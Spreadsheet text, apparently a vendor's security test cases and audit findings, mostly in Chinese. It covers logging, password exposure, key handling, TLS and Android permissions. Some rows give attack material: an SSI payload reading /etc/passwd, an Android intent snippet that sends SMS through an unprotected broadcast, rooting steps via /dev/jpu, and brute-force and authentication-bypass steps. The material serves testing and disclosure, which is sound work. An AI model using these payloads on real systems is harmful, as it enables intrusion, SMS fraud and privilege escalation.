    <t>对于涉及敏感数据显示的Web页面，查看其对应的源代码文件，是否包含禁止页面缓存的代码：
HTML页面的&lt;HEAD&gt;标签内包含如下代码：
&lt;HEAD&gt;
&lt;META HTTP-EQUIV="Expires" CONTENT="0"&gt; 
&lt;META HTTP-EQUIV="Pragma" CONTENT="no-cache"&gt; 
&lt;META HTTP-EQUIV="Cache-control" CONTENT="no-cache"&gt; 
&lt;META HTTP-EQUIV="Cache" CONTENT="no-cache"&gt; 
&lt;/HEAD&gt;
JSP页面的最前面包括如下代码：
&lt;% 
response.setHeader("Cache-Control","no-cache"); 
response.setHeader("Pragma","no-cache"); 
response.setDateHeader("Expires",0); 
%&gt;</t>
  </si>
  <si>
    <t>1.找出目标执行文件调用的所有文件，并确定文件权限。
2.检查目标执行文件条用文件时是否进行输入检查。</t>
  </si>
  <si>
    <t>1.目标系统正常运行
2.查找多用户文件夹/文件</t>
  </si>
  <si>
    <t>1、获取产品相关文档。
2、产品环境可用。</t>
  </si>
  <si>
    <t>1.可以指定操作员帐号的有效开始时间和有效结束时间。
2.可以指定程序帐号的有效开始时间和有效结束时间。</t>
  </si>
  <si>
    <t>问题1（严重）：长时间进行WEB扫描验证，系统自动启动日志被冲满。1）使用APPSCAN扫描工具对WEB安全性进行扫描，配置扫描线程数为1。2）长时间扫描导致系统自动启动日志占满磁盘容量。3）查看日志打印内容如下：2014-06-10 16:18:48.609:WARN:oejh.HttpParser:Full [1302225583,-1,m=0,g=6144,p=6144,c=6144]=….858585858…。建议：需要产品分析为什么打印过多的日志信息。防止正常测试与业务运行过程中导致DOS攻击。 
问题2（提示）： 日志内存大小不支持用户配置，当日志超过阈值时，不产生告警提示用户导出、或者备份日志；而是直接删除旧的日志信息。
问题3（提示）：日志内存大小是1M，当内存超过阈值时，直接覆盖旧的日志信息，没有备份。
问题4（提示）;一旦系统日志当天被写满，日志的完整性和可用性得到破坏，私密性不涉及。建议：采用达到阀值的80%或者别的转存的方式，这样所有的日志都不会丢失。
问题5（提示）：1）删除CRM后台日志； 2）打印日志，提示该文件不存在，日志被删除后没有自动生成，继续记录日志。建议：日志被删除后，应该可以自动生成，并继续记录。
问题6（提示）：发生在第74条和第75条之间。中间少了好几天的日志。并且缺失的这几天对设备有进行操作。
问题7（提示）:1)查询客户信息customer1；2）若只停留在查询出来的首页（关键信息如身份证号码已显示），日志则不会记录该查询操作，需要点击其它页签才会记录日志。</t>
  </si>
  <si>
    <t>1、操作系统和应用系统应默认关闭不安全协议（如：Telnet、FTP）
2、禁止默认使用不安全的算法
3、系统应默认打开审计、监控等安全功能
4、软件完整性校验开关默认值应为“ON”
5、匿名化开关应默认开启
6、应支持关闭FTP、telnet等不安全的服务
7、应支持关闭SSH v1.x等不安全的协议版本
8、应支持关闭SNMPV1/V2协议
9、Web服务同时支持http和https时，http服务应可关闭
10、不使用的端口必须关闭
11、不需要使用的服务应关闭
12、不得通过防火墙过滤关闭端口
13、产品发布时，调试端口必须关闭
14、关闭不是系统业务所必须的端口
15、端口开放范围应合理，不得对外开放内部端口
16、监听端口须绑定到具体IP，且不能监听网卡上配置的所有IP地址（如0.0.0.0）
17、系统安装后须及时清理不必要的安装文件
18、防暴力破解机制须默认开启
19、系统超时退出时间禁止设置为0，0表示永不超时。
20、认证、加密选项须默认选中
21、tcp链接时应设置超时限制
22、应使用安全的协议版本，如SSH v2、TLS v1.1、TLS v1.2、SNMP v3
23、操作系统、数据库、Web服务器等的管理口令应设置有效期，并要求定期更换
24、口令输入框须关闭自动完成（autocomplete）功能</t>
  </si>
  <si>
    <t>问题1（致命）：文打印rom文件信息，存在泄漏风险。
问题2（致命）：明文打印接入点信息，存在安全风险。
问题3（一般）：在trace调试信息中及VOS_NSPRINTF中明文打印会议接入码。
问题4（提示）：WEB_XMLAuthorization web登陆认证时会比较用户名与口令是否正确，在对比过程中会将使用3DES加密的口令解密，但是解密失败会在debug日志中打印“ENCRYPT_3DES_Cbc failed! ulRet:0x%x!”消息，将加密算法暴露出来。
问题5（提示）:PC通过USB访问303HW的LAN侧webUI，并开启burpsuite2 可以抓包查看到页面是否response了过多的用户信息，如IP地址、mac地址、设备IMEI、设备型号等信息.
问题6（提示）：1）在IE的URL输入设备IP地址；2） 使用Burp Suite进行HTTP消息截获，客户端4秒中会发送一次POST请求，服务端未进行任何校验，就返回设备信息，返回信息中：WIFI，SMS,SIG数据是用不到的多余的。
问题7（提示）：NIC日志中打印完整的数据库执行语句。
问题8（提示）：在AC视图下通过perf-file-upload命令配置性能指标采集和上传功能时，配置的FTP用户口令在历史口令中明文显示。</t>
  </si>
  <si>
    <t>1、敏感个人数据禁止明文存储在系统日志文件、代码、Cookie中（存储类软硬件产品除外，如硬盘，数据库等）
2、操作人员访问个人数据之前须对其身份及权限进行验证
3、产品对于个人数据的访问控制策略须满足不同职位职能的权限要求，并可以取消操作人员的访问权限
4、数据主体的银行卡号在存储前须采用安全加密机制进行加密，禁止存储CVV2
5、（可选）具有个人数据导出功能的产品，导出时应提醒操作人员导出的数据中包含个人数据</t>
  </si>
  <si>
    <t>1、产品或服务是否收集隐私声明中没有列出的个人数据，不允许将个人数据用于没有声明的目的
2、个人数据的采集范围、使用目是否与隐私声明中的描述保持一致</t>
  </si>
  <si>
    <t>问题1（一般）：when using firefox web browser to access NBI configuration webpage, the web browser will prompt user to remember password. If user chooses this option, the password of user will be kept in cache of web browser. Also this problem does not exist in other U2000 URL like PMS, IPFPM, Hedex, GCLI. Moreover the password in masked with dot.
问题2（提示）：系统限制了只能本地登陆的图形化Mart系统管理工具，主要用于对系统数据库以及计算分析系统进行管理配置。其登陆界面默认情况下记住用户密码，这样其它操作系统账户只要能登陆操作系统并据有该程序的执行权限，即可直接登陆该系统进行管理操作。</t>
  </si>
  <si>
    <t>1、密钥不允许明文保存在本地
2、密钥材料及密钥组件在本地保存时须严格控制其权限（如权限600或400）</t>
  </si>
  <si>
    <t>1、传输、存储加密用途的工作密钥是否硬编码在代码里
2、系统设计和功能里是否设计和支持密钥更新方法</t>
  </si>
  <si>
    <t>问题1（一般）：WEB管理页面提供了用户退出（LOGOUT）的功能，用户登录WEB页面后点击LOGOUT即可退出登录回到登录界面，想要再次操作必须重新登录 但在用户成功退出登录回到登录页面后，重新输出已登录的url即可继续操作  退出页面后输入此url，即可继续操作 http://192.168.1.1/html/content.asp该问题应为没有及时清空session导致。
问题2（提示）：登陆https://172.2.200.200/SSO/login页面后没有Logout功能按钮，且该页面没有任何业务功能。但是一旦以某用户身份登陆过该页面且未关闭浏览器，即可以直接以该身份继续登陆其他Portal、V360等页面，存在身份被冒用的风险。</t>
  </si>
  <si>
    <t>问题1（致命）：CalendarAppWidgetProvider.java存在对数据文件权限设置不合理的地方，设置权限为MODE_WORLD_WRITABLE模式，造成其他组有写权限，日历文件可以保存个人隐私数据，存在敏感数据泄露或被篡改风险。
问题2（致命）：联系人—》发送名片---》彩信vCard，选择发送出去，或者取消保存到草稿，此时也可以选择其他文件类型发送，这样可以在data\data\com.android.providers.telphony目录下创建一个第三方应用可读写的vcard、录音等文件，联系人、录音被第三方应用可读写，造成敏感数据泄漏，存在安全风险。原因为将app_parts目录设置权限为666 ，造成第三方应用可读可写，造成联系人数据泄漏。
问题3（致命）：该漏洞可以向任意号码发送任意内容的短信。如向运营商发送停机或呼叫转移等短信，或向银行发送申请停掉业务的短信，或向收费平台发送定制短信等。造成用户SIM卡不可用、个人费用的大量损失。    手机管理的TrafficAnalyseManager.java文件中注册了广播com.huawei.dianxinos.optimizer.engine.action. NETFLOW_QUERY_SMS。该广播实现了发送短信的功能。最终会调用到NetAssistantIntentService的服务，实现发送短信的功能。通过如下代码，可以利用该漏洞，在不需要权限的情况下在后台发送短信。Intent intent = new Intent(); ArrayList&lt;String&gt; list = new ArrayList&lt;String&gt;(); list.add("POC"); //短信内容  intent.setAction("com.huawei.dianxinos.optimizer.engine.action.NETFLOW_QUERY_SMS");        intent.putExtra("key_dianxin_sms_number", “手机号码”); //第二个参数是手机号码        intent.putStringArrayListExtra("key_dianxin_sms_body", list);   sendBroadcast(intent);建议对广播增加权限。
问题4（致命）：手机管家故意对外暴露接口，暴露系统权限给第三方，第三方应用可以无权限向系统发送系统级广播，导致系统可以被恶意攻占，死机变砖，安装程序，敏感信息丢失等等严重后果DTS2013110901236开发人员故意规避安全专家提出的安全问题，私自暴露接口给第三方使用，而且未加任何权限检查，这导致手机管家的context可以被第三方劫持，由于手机管家android:sharedUserId="android.uid.system"分享了系统的UID，那么拿到的context也有了系统ROOT权限。那么原本需要ROOT或是显示申请权限的危险广播操作都可以被第三方无权限使用。以无权限发送短信来证明暴露系统context造成的严重后果安装附件提供的APK。 CalculatorPoC.apk1、输入10086，然后按等号进入设置界面，修改倒数两项为自己希望发送短信的内容和联系人，然后按返回键退回2、重新输入10010，然后按等号，此时由于第三方程序未申请"com.android.permission.system_manager_interface"权限（次权限只有系统可以获取），那么发送失败            对比较老版本，例如112等老版本，输入10010是可以成功，这说明此功能是有效的3、重新输入401，然后按等号，几秒后，目标手机收到自己编辑的短信，4、检查软件权限，无发送短信权限。
问题5（严重）：TTY设备驱动权限控制不当申请other组权限。tty是Teletype的缩写，指终端设备。海思芯片调试串口TtyAMA3和ttyAMA4端口权限控制不当，导致对应COM串口可被第三方任意读写执行。1、 存在提权风险2、 存在被第三方可控风险K3V3。
问题6（严重）：问题出现在/dev/jpu编写JNI应用程序使用mmap打开/dev/jpu，传入长度为物理内存，偏移量为物理偏移的参数，程序返回物理内存指针使用该指针可操作所有物理内存通过修改内核指令可将本应用提升为ROOT权限1、安装adb 环境，确保手机没有刷root2、用adb shell 命令“ll /sys/kernel/”查看/sys/kernel/uevent_helper的权限，此时只有ROOT用户有写权限2、将附件中的两个文件放在同一个文件夹3、运行syv.bat，破解程序将会以root权限运行，执行chmod 777 /sys/kernel/uenvent_helper 命令4、用adb shell 命令“ll /sys/kernel/”查看/sys/kernel/uevent_helper的权限，此时被设置为777，所有用户均可访问。问题根因为驱动jpu全局可读写，且mmap不检查参数。
问题7（严重）：以维护员身份登录，执行如下命令，下载证书文件：文件下载成功：使用此命令会泄露网元关键资产，同时，维护员可以使用此命令可以进行任意文件上传，如果用恶意文件替代证书、日志文件，会对网元运行造成较大影响。
问题8（严重）：SFS Client API（libtrustzone_storage.so）封装JNI（java native interface），供上层的调用，这个向上层对外暴露的JNI是没有任何保护的，导致【第三方app】不需要申请任何权限，使用System.load("/system/lib/libtrustzone_storage.so")，就可以调用write()写任意内容到TEE区域，且通过/../../可以目录穿越，写其他非TEE区域。
问题9（严重）：悬浮控件应用中存在使用world_writeable 权限存在提权风险。存在对数据权限设置不合理的地方，设置权限为MODE_WORLD_WRITABLE模式，造成其他组有写权限。
HCSEC-1046-0015 （CVSS 4.0） Maintenance level users can copy the NE user database from an OSN8800 to a local computer</t>
  </si>
  <si>
    <t>1.对被测协议组件的安装包进行反汇编。
2.查找反汇编中是否存在危险函数。例如：strcpy、memcpy等。
3.分析危险函数上下文，看是否存在可能的溢出点。
4.通过动态调试工具加载应用程序，动态调试溢出漏洞。
5.如果可以拿到应用程序源码，应该结合源码进行分析。</t>
  </si>
  <si>
    <t>1、不同类型的业务使用不同的工作密钥，并使用根密钥加密保存工作密钥。
2、密钥材料、密钥在使用完后，及时将存储这些信息的内存清空（free之前推荐先将内存置空）。
3、原则上，产品不提供根密钥、工作密钥导出的接口。
4、工作密钥在系统间分发时，必须加密传输（直接加密或使用IPSec、SSL等加密传输通道）。
5、系统间共享的加密密钥，建议采用自动密钥协商机制进行协商（如DH算法），简化密钥管理，增强安全性。</t>
  </si>
  <si>
    <t>1、查找产品文档中根密钥的生成说明或产品源码中搜索根密钥生成代码，看根密钥是否硬编码在产品中。
2、根密钥如果采用初始向量和密钥材料的生成方法，则查看初始化向量和密钥材料是否直接硬编码在产品中。
备注：本用例可以结合对产品线人员访谈进行。</t>
  </si>
  <si>
    <t>1、错误提示信息
2、URL中是否存放Session ID、Token等敏感信息
3、日志文件中是否包含密码、密钥、银行账号、用户名等敏感信息
4、调试信息中是否包含密码、密钥等敏感信息</t>
  </si>
  <si>
    <t>问题1（致命）：1）修改个人信息,包括密码答案；2）通关BurpSuite抓包,发现系统使用http明文传输密码答案；3）获取用户的用户名和加密答案后就可以通过密码重置功能对用户密码进行修改。
问题2（致命）： 登录传输策略设置成强制HTTPS模式时，在IE地址栏中输入http://172.5.202.110/login.html?sslport=443&amp;port=80登录，仍然采用http传输，不安全协议无法关闭。
问题3（致命）：BMC的KVM方式登录eCNS610时，默认采用HTTP协议不够安全，不支持HTTPS方式，无法关闭。
问题4（致命）：1）登录FM部件操作系统，执行natsta &amp;ndash;na命令发现8190端口默认开放状态，并且开放的端口是非SSL加密端口。2）产品确认目前不支持关闭8190端口。并且认证方式是先通过北向命令获取RSA公钥，再通过公钥对用户密码进行加密，传输到服务端鉴权。由于http协议不加密，相当于明文传输。建议：支持关闭，建议缺省关闭。产品CPI资料中应建议用户使用安全协议，如需使用不安全协议，应提示风险。
问题5（致命）：1）ITA组件告警邮件服务器配置不支持SSL配置，导致ITA和邮件服务器之间明文传输用户名密码；2）在ITA和邮件服务器之间抓包发现，用户名和密码都是64位BASE编码，等同与明文传输。
问题6（致命）：设备作为FTP Server时，只支持FTP协议，不支持安全的SFTP。
问题7（致命）：FM部件HTTP 协议8190端口默认打开，不支持关闭，并且密码传输过程相当于明文传输。参看DTS2014041607167
问题8（一般）：FTP是不安全的协议，其用户登录过程中使用明文传输用户名和口令，存在被嗅探的风险。如果FTP也使用SSH的账号和口令，一旦登录过程中用户名和口令被恶意使用者嗅探获取，即相当于获取SSH的账号口令，存在被恶意利用的风险。参看DTS2014062507647
问题9（一般）：登陆口令等敏感信息使用base64转换后进行传输，没有对口令进行安全加密算法加密或采用https进行安全传输，可能导致口令被窃取。
问题10（一般）：1）使用http登录web页面，修改wifi密码时使用burpsuite抓包，可查看wifi密码为明文。2）http://192.168.3.1/api/ntwk/guest_network请求（GET）的响应体会返回访客网络的明文密码。3）http://192.168.3.1/api/ntwk/WlanGuideBasic请求（GET）的响应体会返回家庭网络的明文密码，并且在登陆后会立马调用该请求。4）虚拟专用网多个请求和响应中都存在明文密码，如http://192.168.3.1/api/ntwk/ddns的post请求中存在明文密码传输。
问题11（一般）：1）拦截修改的用户密码，发现产品使用的是base64编码对密码进行编码传输。2）Wifi密码修改使用明文传输。
问题12（一般）：1） 是用burp suite工具拦截修改账户密码的请求。2） 把admq_tmp和Confirm_admq_tmp替换成修改的密码，用RSA加密。3） 修改完后forward，将会是修改成篡改的新密码。测试结果显示能成功篡改修改的新密码。</t>
  </si>
  <si>
    <t>1.数字证书对应的私钥必须支持按照PKCS标准格式进行安全加密存储
2、对于华为预置颁发的证书或自研系统生成的证书，用于加密私钥的口令的复杂度必须满足口令复杂度要求</t>
  </si>
  <si>
    <t>1、密钥是否明文保存在本地
2、密钥材料及密钥组件在本地保存时是否严格控制其权限（如权限600或400）</t>
  </si>
  <si>
    <t>1、用户登录失败后，登录界面禁止提示"用户名不存在"、"口令必须是6位"、"用户名无效"之类的有助于攻击者用于猜解系统用户名/口令的信息
2、如果认证失败的返回报文中携带了错误码，错误码应同时代表“用户名或密码错误”的含义；通过分析错误码应无法分析出可能的错误原因是“用户名不存在”、“口令必须是6位”、“用户名无效”之类的具体错误
3、（可选）无论帐号名是否存在，在达到锁定阈值后，都应该启动锁定机制</t>
  </si>
  <si>
    <t>问题1（一般）：web页面系统管理-&gt;系统配置页面下，点击“FTP配置”、“邮件服务器配置”、“SNMP Agent”页面，查看页面源代码，可发现相关FTP/SNMP/EMAIL相关密码明文。参看DTS2014091905661
问题2（提示）：用户密码设置、修改的时候，设置的密码明文显示。参看DTS2014070203282
问题3（提示）：登录设备，并用为用户修改密码。可以看到密码是明文回显的，没有作屏蔽处理。参看DTS2014052306850
问题4（提示）：1）radius服务器共享密钥，在网管上时密文显示，但在命令行界面明文显示；2）NTP密钥，网管密文显示，命令行明文显示。
HCSEC-1039-1014 The command used to change the password is shown when displaying the current configuration.  This reveals simple super user passwords.</t>
  </si>
  <si>
    <t>1.密钥和向量是随机生成的
2.随机数的生成使用的是安全随机数方法，例如：
1）OpenSSL库的RAND_bytes()；
2）中软iPSI组件的CRYPT_random()；
3）JDK的java.security.SecureRandom()；
4）类Unix平台的/dev/random文件；
5）Windows平台的RtlGenRandom()。</t>
  </si>
  <si>
    <t>1.查看RSA源码是否使用使用OAEP填充方式
2.查看Clipher的指定填充方式</t>
  </si>
  <si>
    <t>1、使用工具对SSL协商过程进行抓包
2、将clienthello的sessionid设置不为空
3、将clienthello中的cipher_suites设置为空
4、查看设备服务器端响应</t>
  </si>
  <si>
    <t>should
记录层压缩算法中，当压缩内容的长度大于 2^14 字节时，TLS应该报告一个致命的解压缩失败错误。 业界标准</t>
  </si>
  <si>
    <t>1、查找代码中HMAC实现片段，查看其中PRF（伪随机函数）的产生是否符合标准定义的RFC要求：
 a）PRF需要使用两种哈希算法（MD5、SHA1）产生：PRF(secret, label, seed) = P_MD5(S1, label + seed) XOR P_SHA-1(S2, label + seed);label是一个ASCII的字符串，不附带长度字节，或者后面附加空字符；
 b）P_hash(secret, seed) = HMAC_hash(secret, A(1) + seed) + HMAC_hash(secret, A(2) + seed) + HMAC_hash(secret, A(3) + seed) + ...
A()定义为：
A(0)＝密根；
A(i)＝HMAC_hash(secret,A(I-1))</t>
  </si>
  <si>
    <t>1.系统不会出现宕机、重启；
2.攻击停止后系统恢复正常；</t>
  </si>
  <si>
    <t>1、以操作员帐号登录，访问修改口令的界面，为当前登录用户设置新口令，系统是否要求输入旧口令，并验证旧口令是否正确。
需要测试修改口令的常见操作员参见“操作员账号的口令长度测试”-不限于人机接口/可远程访问的机机接口/内部接口涉及的口令</t>
  </si>
  <si>
    <t>1.已知目标网站的域名或IP地址
2.Web业务运行正常</t>
  </si>
  <si>
    <t>1.运行WSDigger
2.点击右下角的Next按钮进入WSDL页面
3.在WSDL输入框中输入接口的WSDL地址
4.点击Get Methods按钮，获取接口方法
5.在左侧的接口方法树形框中选择要测试的方法
6.选择菜单Attacks-&gt;Select Attack Type，弹出攻击类型对话框，在对话框左侧的选择列表框中选择所有的测试项
7.点击Start
8.观察返回的结果，根据WSDL接口定义的返回事件判断是否成功
备注：此操作也可以使用SOAPUI/restClient工具。</t>
  </si>
  <si>
    <t>1.目标应用运行正常
2.存在web service接口的文件，或存在调用系统命令接口</t>
  </si>
  <si>
    <t>1.比对产品说明文档和WSDL文档，找出产品说明文档上面未提到的接口
2.若存在未公开的接口，访问此接口，查看是否有将敏感信息传送到客户端</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.APPSCAN工具</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.待测网站存在文件上传页面</t>
  </si>
  <si>
    <t>1.进入系统
2.对存在使用客户端输入作为值进行循环处理的输入框输入一个极大的值，导致服务器端处理能力下降。
3.如果客户端进行了限制，可以使用代理工具拦截请求消息，并修改相应的字符，发送至服务器
以下是 java 编写的一个例子：
public class MyServlet extends ActionServlet {
public void doPost(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
. . .
String [] values = request.getParameterValues("CheckboxField");
// Process the data without length check for reasonable range – wrong!
for ( int i=0; i&lt;values.length; i++) {
// lots of logic to process the request
}
. . .
}
. . .
}
备注：这个测试里我们检查是否可能让应用强制循环一段需要很多计算机资源的代码，目的是减弱总体性能。如果用户能直接或非直接的指定一个可以用作循环计数器的值，就能够引起服务器的执行问题。</t>
  </si>
  <si>
    <t>1.进入系统，在输入框中构造如下指令，并提交到系统&lt;!--#include virtual="/etc/passwd" --&gt;
2.SSI指令字符集如下：&lt; ! # = / . " - &gt; and [a-zA-Z0-9]，通过这些字符完成SSI语句构造。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统认证实现使用XPATH技术</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.Web业务存在身份级别
3.已知某页面（假设为http://www.example.com/abc.jsp）.提交的参数中存在代表用户（假设为userA）身份的标志（假设为operator），
4.存在与userA同级别权限的用户userB
5.测试机安装burpsuit软件</t>
  </si>
  <si>
    <t>1.系统运行正常
2.用户已经登录系统</t>
  </si>
  <si>
    <t>1.登录系统；
2.使用Web代理工具拦截请求消息，查看sessionid长度。</t>
  </si>
  <si>
    <t>1.系统运行正常
2.已知多个正确的用户名、口令</t>
  </si>
  <si>
    <t>1.以管理员帐号登录系统；
2.检查是否有会话管理相关的界面，尝试终止已登录的某帐号的会话，或者将某用户状态置为注销状态。</t>
  </si>
  <si>
    <t>1.系统运行正常
2.已知正确的用户名、口令</t>
  </si>
  <si>
    <t>1.使用系统管理员帐号登录系统
2.在用户管理（或账号）界面，检查“操作员帐号长时间未使用自动锁定”可配置，并将锁定时间设置为3天或更短，并导致帐户锁定。
3.检查“操作员帐号长时间未使用自动锁定后的解锁方式”只能为手工解锁。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.已知系统管理员帐号</t>
  </si>
  <si>
    <t>1.登录系统，进入功能页面，并复制相关的URL信息
2.退出系统后，直接提交页面请求；
3.通过URL绕过，通过修改URL参数方式绕过鉴权，如authenticated=no等
注：认证参数根据URL地址信息进行排查，修改后直接发送至服务器，查看是否可以绕过认证。</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.已知系统帐号及密码
3.系统提供“连续登录失败锁定”功能；</t>
  </si>
  <si>
    <t>1.访问带有验证码的登录页面；
2.在登录界面填入错误的用户名和口令，填入正确的验证码，提交表单；
3.在Web代理工具拦截窗口中，逐条放通登录请求，复制带用户名密码的那条请求的全部内容，阻塞住验证码刷新请求、错误响应的页面刷新请求、登录重定向请求等；
4.在Web代理工具的阻塞窗口中，选择一个，将步骤3复制的请求信息覆盖原请求内容，并将其中的用户名和口令改为正确的用户名和口令，然后提交该请求；
5.取消web代理工具的拦截功能，并放通步骤4请求之后的所有新请求</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.已知系统帐号及密码
3.配置完成WEB代理工具</t>
  </si>
  <si>
    <t>登录认证必须提供验证码；或者，多次登录失败后，必须提供验证码。
注意：系统中存在锁定功能，验证不一定为必须设置。</t>
  </si>
  <si>
    <t>1.打开登录界面或需要被暴力破解的页面；
2.使用WEB代理工具拦截登录信息，并将请求记录通过“Send to Intruder”发送到Intruder工具界面。
3、加载相应的破解字典，进行破解</t>
  </si>
  <si>
    <t>1.Web服务器运行正常
2.拥有Web服务器操作系统的帐号和口令
3.已知Web容器的部署，配置目录</t>
  </si>
  <si>
    <t>1.被测目标系统正常运行
2.被测系统支持SSH接入</t>
  </si>
  <si>
    <t>1.被测目标系统正常运行
2.SecureCAT工具通过正确配置，扫描过系统并生成了报告</t>
  </si>
  <si>
    <t>方法1：使用SecureCat工具扫描操作系统，确认检查项13.1 Ensure Password Fields are Not Empty (Scored)是否pass
方法2：
1.登陆被测系统，进入命令行模式
2.执行命令 /bin/cat /etc/shadow | /bin/awk -F: '($2 == "" ) { print $1 " does not have a password "}'</t>
  </si>
  <si>
    <t>1.获取到源代码。
2.使用IPSEC且IPSEC中使用DH算法</t>
  </si>
  <si>
    <t>1.软件包是准确的
2.提供摘要文件是准确的</t>
  </si>
  <si>
    <t>1.网络正常
2.目标系统运行正常</t>
  </si>
  <si>
    <t>只能通过正常的访问方式进入系统，除此之外的访问方式都不存在，例如以下隐蔽访问方式都不存在：
隐藏账号、隐藏口令、无鉴权的隐藏模式命令/参数、隐藏组合键访问方式；隐藏的协议/端口/服务；隐藏的生产命令/端口、调试命令/端口
注：不在正规发布资料中明确描述的合理跳转方式同样不允许存在（这里的跳转不包括内部未变更权限的跳转，只针对不同级别不同模块产品间的跳转，有问题的如：和第三方未经商定就允许其链接到鉴权后的页面或功能模块）</t>
  </si>
  <si>
    <t>1、打开客户端，检查不输入口令或者输入错误的口令是否登录失败
2、使用search and replace搜索客户端软件包及其安装文件，检查是否存在空口令或被质疑成空口令的内容，password、passwd
3、反编译apk软件包，使用jd-gui.exe搜索口令关键字，检查是否存在空口令或被质疑成空口令的内容password、passwd</t>
  </si>
  <si>
    <t>1.网络正常
2.目标系统运行正常
3.收集产品资料</t>
  </si>
  <si>
    <t>预置条件：
1、系统提供“连续登录失败锁定”功能；
测试步骤：
1、连续N次使用错误的口令登录使帐号锁定（N&lt;10）；
2、清除本地记录（设置→应用程序→XX模块，点击清空数据，并强制停止XX模块），再次打开APP，使用该帐号正确的口令登录</t>
  </si>
  <si>
    <t>1、列出的密码输入场景中，密码框中的密码均不能显示明文
2、日志中不显示口令明文
3、内存中保存的密码，最好为局部变量或动态申请的变量，使用完成后就销毁</t>
  </si>
  <si>
    <t>访谈确认：
1、确认登录口令的加密算法是否是SHA256等不可逆算法</t>
  </si>
  <si>
    <t>1、杀毒软件不会报出存在病毒、木马、恶意程序等安全风险提示
2、应用使用正常，使用过程中杀毒软件不会报出结果1中的安全风险提示</t>
  </si>
  <si>
    <t>1、开发使用Fortify和Coverity对测试产品的版本源代码进行安全扫描和整改
2、检查报告中是否包含产品apk
3、检查每个记录的处理情况</t>
  </si>
  <si>
    <t>1.能获取到源代码
2.使用HASH算法生成MAC</t>
  </si>
  <si>
    <t>1、工具使用：
   1）使用CodeCC中的Fortify和Coverity，能扫出部分加密算法问题的代码；
   2）使用Nmap调用加密算法的套件，能扫出部分加密算法的问题；
2、人工代码走读：
   1)、Openssl调用RSA_generate_key函数生成密钥对时，第二个参数（公共指数）禁止设置为3
   2)、如果调用iPSI，开发人员是否参考了iPSI《Cryptography Developer Guide》提供的的官方例子，而不是将e设置成3</t>
  </si>
  <si>
    <t>目的和意义：
3DES算法是限制使用的密码算法，其密码强度已经不能满足未来的安全需求。只有3DES算法密钥长度足够长的情况下，才可以出于“行业标准遵从、第三方对接、向下兼容”的目的使用。“密钥足够长”的具体要求就是K1、K2、K3各不相同。
说明：
3DES是DES算法的扩展，加密过程执行3次DES运算：第一次使用k1加密，第二次使用k2加密，第三次使用k3再加密。如果K1!=K2!=K3，安全强度可以达到112，NIST规定在2030年之前还可以保留使用；如果K1=K3!=K1，安全强度只有80，已经被NIST禁止使用
子检查项：
1、3DES的密钥长度是否达到128bit
2、在3DES如果使用的192bit的密钥长度，则密钥的前64bit、中间64bit、后面64bit的数据禁止存在重复现象</t>
  </si>
  <si>
    <t>1、系统运行正常
2、获取产品源码及相关文档资料
3、对于网络传输，客户端与服务端通信认证通信采用密码认证</t>
  </si>
  <si>
    <t>1.新开发产品通过检查设计文档，查看加解密相关设计是否满足要求。
2.定制/补丁版本由于历史原因造成设计文档不全或者老代码无持续维护潜藏风险通过以下方式：
  a.结合敏感数据加密存储红线条目一起测试：搜索数据库/文件/内存等存储的所有密码、银行账号、密钥等敏感数据，确认其算法，检查是否满足要求。
  b.使用Search and Replace.zip扫描代码中非法算法关键字比如专利算法的：IDEA。
  c.代码飞检。</t>
  </si>
  <si>
    <t>1、证书私钥在系统内部按照PKCS标准加密存储。
2、如果产品采用基于口令的私钥加密机制，则需要做口令复杂度检查。且需要提供口令修改功能，并在修改时验证旧口令。</t>
  </si>
  <si>
    <t>1.使用shell脚本和工具检查代码中密钥敏感字符串（key、sharekey、encrypt、enc、dec、decrypt等），并结合开发人员人工访谈&amp;分析，确认初始密钥是否使用工具生成。
2.根据场景分析可能会用到加密密钥的模块，重点走读这部分代码，检查是否存在硬编码密钥。</t>
  </si>
  <si>
    <t>1.访问显示敏感数据的页面，检查用户未进行过身份认证，是否会弹出认证界面。
2.访问显示敏感数据的接口，检查用户未进行过身份认证，是否访问失败。
3.访问显示敏感数据的文件(配置文件、脚本、日志等等)。
4.根据产品特性排查其他访问敏感数据的形式，检查检查用户未进行过身份认证，是否访问失败。
注：可通过WebScarab/burpsuite_v1.4.01.jar抓包获取页面的URL后粘贴到IE进行访问测试，其他接口参考产品自己的工具。</t>
  </si>
  <si>
    <t>1.日志文件中不存在明文的敏感数据。
2.敏感信息可以加密或掩码处理
说明：不包含调试日志，但调试日志不能包含明文口令、银行账号和原始通信内容。</t>
  </si>
  <si>
    <t>1、在服务器上取用一个签过名的apk
2、在手机上安装该apk
3、在服务器上取用一个不同签名的apk
4、安装这个新的apk</t>
  </si>
  <si>
    <t>1、通信双方配置合法有效的证书，看是否可以协商通过。
2、尝试修改对端证书的签名字段，看是否可以协商通过。
3、尝试修改对端证书请求的Common Name字段，重新申请、颁发证书，之后使用新的证书协商，看是否可以协商通过。
4、修改被测设备系统时间，使对端证书过期，看是否可以协商通过。
5、对于支持多级证书认证的通信双方，尝试删除中间一级，看是否可以协商通过。
备注：DER编码的证书可以使用16进制编辑器直接修改；PEM编码的证书可以使用openssl等工具转换为DER编码后修改。</t>
  </si>
  <si>
    <t>访谈确认：
1、如果某个局点发布的客户端是从基线版本继承而来，对于该局点不需要的功能
（1）是否已经将代码彻底删除掉或注释
（2）是否可以通过逻辑判断、配置文件来禁用功能</t>
  </si>
  <si>
    <t>1、应用软件连接至互联网之前在UI界面提供明示同意的选项并获得用户明确同意
2、产品无操作界面，在产品资料中明确说明程序会连接至互联网</t>
  </si>
  <si>
    <t>1、检查收集的个人数据是否都具有明确的目的及保护措施
2、检查是否在产品设计文档里列出了产品收集和处理个人数据的场景、个人数据类型、处理方法、收集目的、个人数据的保护措施以及数据存留期等</t>
  </si>
  <si>
    <t>1、系统支持前端输入XML数据或导入XML文件的功能。
2、获取产品源码。</t>
  </si>
  <si>
    <t>1、获取产品资料。
2、产品环境可用。</t>
  </si>
  <si>
    <t>1、系统不存储根密钥，在需要时，根据初始向量和密钥材料生成根密钥。
2、初始向量赋初值后，有增加一些随机的运算已获得最终的初始向量，并非直接硬编码在产品中。
